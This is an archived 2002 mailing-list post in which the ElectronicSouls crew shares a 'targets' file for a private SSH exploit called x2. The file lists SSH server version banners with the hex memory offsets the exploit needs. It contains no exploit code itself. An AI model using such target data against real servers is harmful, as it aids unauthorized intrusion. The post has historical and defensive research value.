lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - 0day x2 strings

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

A while ago, our supplier divineint, gave us a copy of a super exploit
known as x2.  We researched the exploit and came up with these strings
to work with it.

# cat 0day-x2-strings.txt
/*
 * THIS IS CONFIDENTIAL MATERIAL!
 * !! KEEP THIS MAD PRIVATE !!
 * (C) BrainStorm - ElectronicSouls
 *
 * if you know the private x2 ssh exploit,
 * you know the cute targets file..
 * well now j00 can add some new 0day targetz !
 * i did some research..umm im still doing actually ;)
 *
 * DONT GIVE THIS TARGETS OUT !!!
 * THIS FILE IS PROPERTY OF THE ElectronicSouls CREW
 * AND SHOULD _NOT_ BE DISTRIBUTED !!
 *
 */


Small - by [ElectronicSouls] SSH-1.5-1.2.26,0x08080000,0x08184000,0x00000004,0x00010004,0x00000000,0x08400000,0x7a,0x0805,0
/* 1.2.26 - by Manipul8r ;) */

Small - by [ElectronicSouls] SSH-1.5-OpenSSH-1.2.3,0x0806d000,0x080725ec,0x0000c804,0x00010004,0x00000000,0x08400000,0x7a,0x0805,0
Small - by [ElectronicSouls] SSH-1.5-1.2.31,0x08089604,0x083fa9fc,0x0000c804,0x00005604,0x00000000,0x08400000,0x7a,0x0805,0
Small - by [ElectronicSouls] SSH-1.5-1.3.07,0x0807b000,0x083f1374,0x00019004,0x00010004,0x00000000,0x08400000,0x7a,0x0805,0
Small - by [ElectronicSouls] SSH-1.99-OpenSSH_2.1.1,0x08210000,0x083f99b4,0x00000004,0x0000664c,0x00000000,0x08400000,0x96,0x0805,0
/* i could only find non-linux systems running F-SECURE, and i cant add new shellcode to x2 since i dont have the src ;(  */
/* so its a more or less proof-of-concept code ... yea it isnt that secure ;)                                             */

Small - by [ElectronicSouls] SSH-1.5-1.3.6_F-SECURE_SSH,0x00032004,0x083d503c,0x0002afc4,0x00010004,0x00000000,0x08400000,0x7a,0x0805,0

/*
 *  ..yeah this was update number 2 !!
 *  to be continued ;]
 *
 */


[ElectronicSouls-2k1]

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"We Sing The Body Electric"
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nGM0MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltiGIAn10iC5IlIyb4
zTF8jYL6tBmj5UdMAJ9oQkuPl8xNuQDJpU8tUae0OpmqnA==
=FQ51
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ